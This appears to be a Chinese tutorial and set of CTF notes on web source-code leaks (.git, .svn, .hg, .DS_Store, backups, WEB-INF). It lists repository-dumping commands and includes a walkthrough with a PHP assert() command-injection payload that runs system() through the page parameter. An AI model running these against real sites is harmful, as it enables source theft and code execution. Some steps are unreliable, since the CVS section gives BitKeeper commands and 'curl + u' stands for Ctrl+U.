常见Web源码泄露总结

背景

本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。

源码泄漏分类

.hg源码泄漏

漏洞成因:

hg init的时候会生成.hg

e.g.http://www.example.com/.hg/

漏洞利用:

工具:dvcs-ripper

rip-hg.pl -v -u http://www.example.com/.hg/

.git源码泄漏

漏洞成因:

在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。

e.g. http://www.example.com/.git/config

漏洞利用

工具:

GitHack

GitHack.py http://www.example.com/.git/

dvcs-ripper

rip-git.pl -v -u http://www.example.com/.git/

.DS_Store文件泄漏

漏洞成因:

在发布代码时未删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息。

漏洞利用:

http://www.example.com/.ds_store

注意路径检查

工具:

dsstoreexp

python ds_store_exp.py http://www.example.com/.DS_Store

网站备份压缩文件

在网站的使用过程中,往往需要对网站中的文件进行修改、升级。此时就需要对网站整站或者其中某一页面进行备份。当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站web目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。

漏洞成因及危害:

该漏洞的成因主要有以下两种:

  1. 服务器管理员错误地将网站或者网页的备份文件放置到服务器web目录下。
  2. 编辑器在使用过程中自动保存的备份文件或者临时文件因为各种原因没有被删除而保存在web目录下。

漏洞检测:

该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载,利用。源代码中所包含的各类敏感信息,如服务器数据库连接信息,服务器配置信息等会因此而泄露,造成巨大的损失。被泄露的源代码还可能会被用于代码审计,进一步利用而对整个系统的安全埋下隐患。

.rar
.zip
.7z
.tar.gz
.bak
.swp
.txt
.html

SVN导致文件泄露

Subversion,简称SVN,是一个开放源代码的版本控制系统,相对于的RCS、CVS,采用了分支管理系统,它的设计目标就是取代CVS。互联网上越来越多的控制服务从CVS转移到Subversion。

Subversion使用服务端—客户端的结构,当然服务端与客户端可以都运行在同一台服务器上。在服务端是存放着所有受控制数据的Subversion仓库,另一端是Subversion的客户端程序,管理着受控数据的一部分在本地的映射(称为“工作副本”)。在这两端之间,是通过各种仓库存取层(Repository Access,简称RA)的多条通道进行访问的。这些通道中,可以通过不同的网络协议,例如HTTP、SSH等,或本地文件的方式来对仓库进行操作。

e.g.http://vote.lz.taobao.com/admin/scripts/fckeditor.266/editor/.svn/entries

漏洞利用:

工具:

dvcs-ripper

rip-svn.pl -v -u http://www.example.com/.svn/

Seay-Svn

WEB-INF/web.xml泄露

WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。

WEB-INF主要包含一下文件或目录:

  • /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
  • /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
  • /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
  • /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
  • ``:数据库配置文件

漏洞成因:

通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。

漏洞检测以及利用方法:

通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。
一般情况,jsp引擎默认都是禁止访问WEB-INF目录的,Nginx 配合Tomcat做均衡负载或集群等情况时,问题原因其实很简单,Nginx不会去考虑配置其他类型引擎(Nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改Nginx配置文件禁止访问WEB-INF目录就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!

CVS泄漏

漏洞利用

测试的目录

http://url/CVS/Root 返回根信息
http://url/CVS/Entries 返回所有文件的结构

取回源码的命令

bk clone http://url/name dir

这个命令的意思就是把远端一个名为name的repo clone到本地名为dir的目录下。

查看所有的改变的命令,转到download的目录

bk changes

Bazaar/bzr

工具:

dvcs-ripper

rip-bzr.pl -v -u http://www.example.com/.bzr/

工具推荐

index.php.swp

此为linux中的index.php备份文件使用kail中的命令打开

vim -r index.php

之后选择对应序号然后退出并保存

:wq!

git源码泄露与githack使用

查看网页发现有.git所以使用dirsearch搜索一下

python dirsearch.py -u http://111.200.241.244:53301/

搜到.git再次使用漏洞利用目录下的githack下载下来

python GitHack.py http://111.200.241.244:53301/.git/

得到源码

<?php

if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

其中assert()函数会将括号中的字符当成代码来执行,并返回true或false。
strpos()函数会返回字符串第一次出现的位置,如果没有找到则返回False
这里的两个assert看起来没什么破绽,但是用到了上面的file变量
于是重心就放在file变量中,发现file变量是用我们输入的page变量拼接而成的,而且没有任何的过滤,看到了胜利的曙光!
我们可以在这段输入的字符中插入system函数来执行系统命令。

$file = "templates/" . $page . ".php";

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
注意到调用file时用的单引号和括号来限制file的范围。
于是可以构造url为
page=abc') or system("cat templates/flag.php");//

img

因为在strpos中只传入了abc,所以其肯定返回false,在利用or让其执行system函数,再用” // “将后面的语句注释掉

git源码泄露之暂存区

这里也扫到了git源码泄露

1646571723906

git源码泄露,直接使用

python2 githack http://111.200.241.244:50508/.git/

但是这里发现代码并不全面而从控制台可以看到提示

1646648718576

这里便使用githacker

python GitHacker.py --url http://111.200.241.244:59917/.git/ --folder result #这里发现只有1.0.2可以

这里接着使用,查看过去命令

git log --reflog

1646652719296

接着回退到这个版本

git reset --hard  e5b2a2443c2b6d395d06960123142bc91123148c

这里就得到完整代码了

web1

右键源代码

image-20220326182418721

ctrl+u

image-20220326182454792

web2

curl + u

image-20220329213624668

image-20220329213600822

web3

image-20220331221134879

image-20220331221140789